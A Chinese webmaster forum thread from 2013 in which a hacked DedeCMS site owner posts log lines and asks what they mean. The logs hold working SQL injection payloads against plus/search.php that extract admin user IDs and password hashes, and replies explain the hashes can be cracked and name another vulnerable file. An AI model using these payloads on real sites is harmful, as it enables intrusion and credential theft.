百独托管7500 紫田网络超高转化播放器收cps[推荐]速盾CDN 免实名免备防屏蔽阿里云 爆款特卖9.9元封顶提升alexa、IP流量7Q5团队
【腾讯云】中小企福利专场【腾讯云】多款产品1折起高防 随时退换 好耶数据小飞国外网赚带你月入万元炎黄网络4H4G10M 99每月
香港带宽CN2/美国站群优惠中客数据中心 服务器租用联盟系统移动广告平台 中易企业专场腾讯云服务器2.5折九九数据 工信部正规资质
腾讯云新用户大礼包代金券高价收cpa注册量高价展示【腾讯云】2核2G/9.93起租服务器找45互联 随时退换阿里云 短信服务 验证秒达

[技术交流] 求解:dede网站被黑 [复制链接]
查看:8128 | 回复:16

9

主题

326

帖子

99

积分

保护或锁定(状态异常,请联系客服)

贡献
138
鲜花
1
注册时间
2005-12-27
发表于 2013-7-15 07:01:51 | 显示全部楼层 |阅读模式 来自 中国江苏南京
20积分
dede cms网站被黑,data里面有这样的txt,想知道这个txt里面的执行语句是什么意思?另外我网站什么地方不安全(漏洞)

dede cms网站1:

117.95.116.207||/plus/search.php?keyword=as&typeArr%5B%20uNion%20%5D=a||SELECT channeltype FROM `dede_arctype` WHERE id= uNion LIMIT 0,1;||SelectBreak


dede cms网站2:
58.22.135.103||/plus/search.php?keyword=aa&typeArr%5B111%3D@%60%5C'%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60%5C'%60+%5D=a||SELECT tp.*,ch.typename as ctypename,ch.addtable,ch.issystem FROM `dede_arctype` tp left join `dede_channeltype` ch on ch.id=tp.channeltype  WHERE tp.id='111=@`\'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `dede_admin`#@`\'` ' LIMIT 0,1;||SelectBreak

回复

使用道具 举报

2万

主题

11万

帖子

20万

积分

落伍者(八仙过海)

落伍管理员

Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23

贡献
8888
鲜花
1138
注册时间
2009-12-23

落伍草根英雄QQ绑定落伍者落伍手机绑定

发表于 2013-7-15 13:37:46 | 显示全部楼层 来自 中国河南郑州
sql注入吧,dede有补丁就打一下
汽车轴承 www.cbs86.com
马上颂快递 马上颂快递cn
################想出现这里,PM偶!!!!!!################。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
回复

使用道具 举报

112

主题

1533

帖子

1329

积分

落伍者(两全齐美)

菜鸟

Rank: 2

贡献
240
鲜花
11
注册时间
2005-4-27

QQ绑定落伍者落伍手机绑定

发表于 2013-7-16 14:39:57 | 显示全部楼层 来自 中国吉林长春
cnjiao 发表于 2013-7-16 13:30
前面的ip怎么解释呢?是什么意思

那段txt是楼主导出的日志,某IP在某时间访问的页面

被黑原因:SQL注入
[http://www.OEinc.cn]
[http://www.laohantou.com]
回复

使用道具 举报

9

主题

326

帖子

99

积分

保护或锁定(状态异常,请联系客服)

贡献
138
鲜花
1
注册时间
2005-12-27
 楼主| 发表于 2013-7-15 13:34:35 | 显示全部楼层 来自 中国江苏南京
没有了解的吗
回复

使用道具 举报

335

主题

1万

帖子

7万

积分

落伍者(五谷丰登)

Rank: 8Rank: 8

贡献
13849
鲜花
7
注册时间
2012-11-19

QQ绑定落伍手机绑定

发表于 2013-7-15 13:36:02 | 显示全部楼层 来自 中国江苏无锡
我不懂技术的啊
回复

使用道具 举报

68

主题

3060

帖子

2706

积分

落伍者(两全齐美)

Rank: 2

贡献
667
鲜花
9
注册时间
2009-1-25
发表于 2013-7-15 13:43:45 | 显示全部楼层 来自 中国山东青岛
好复杂的SQL语句
请用纯洁的心点击:俺去也纯洁领地
回复

使用道具 举报

9

主题

326

帖子

99

积分

保护或锁定(状态异常,请联系客服)

贡献
138
鲜花
1
注册时间
2005-12-27
 楼主| 发表于 2013-7-16 13:30:04 | 显示全部楼层 来自 中国江苏南京
前面的ip怎么解释呢?是什么意思
回复

使用道具 举报

1466

主题

1万

帖子

41万

积分

落伍者(八仙过海)

服务器安全专家

Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23

贡献
5051
鲜花
84
注册时间
2005-2-26

落伍手机绑定

发表于 2013-7-16 14:31:41 | 显示全部楼层 来自 中国四川成都
dede自身漏洞多,找我们吧,安全套装,彻底解决。
回复

使用道具 举报

1659

主题

2万

帖子

2万

积分

落伍者(四季发财)

Rank: 4

贡献
188
鲜花
56
注册时间
2011-12-30

落伍手机绑定

发表于 2013-7-16 14:47:47 | 显示全部楼层 来自 中国河北邢台
这个是可以弄到后台的MD5加密密码 然后去解密出来就是后台的登陆密码,但是这个只是单纯的找到登陆密码,找后台貌似也很难的
废旧钢筋切粒机  www.fengchuan123.com
  
  www.yinhanglilv5.com [url=http://www.fuhao114.com/]符
回复

使用道具 举报

1466

主题

1万

帖子

41万

积分

落伍者(八仙过海)

服务器安全专家

Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23Rank: 23

贡献
5051
鲜花
84
注册时间
2005-2-26

落伍手机绑定

发表于 2013-7-16 14:53:57 | 显示全部楼层 来自 中国四川成都
光过滤SQL注入没用,Plus/mytag_js.php也存在漏洞。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

论坛客服/商务合作/投诉举报:2171544 (QQ)
落伍者创建于2001/03/14,本站内容均为会员发表,并不代表落伍立场!
拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论!
落伍官方微信:2030286 邮箱:(djfsys@gmail.com|tech@im286.com)
© 2001-2014

浙公网安备 33060302000191号

浙ICP备11034705号 BBS专项电子公告通信管[2010]226号

  落伍法律顾问: ITlaw-庄毅雄

手机版|找回帐号|不能发帖?|Archiver|落伍者

GMT+8, 2024-5-18 06:08 , Processed in 0.138023 second(s), 35 queries , Gzip On.

返回顶部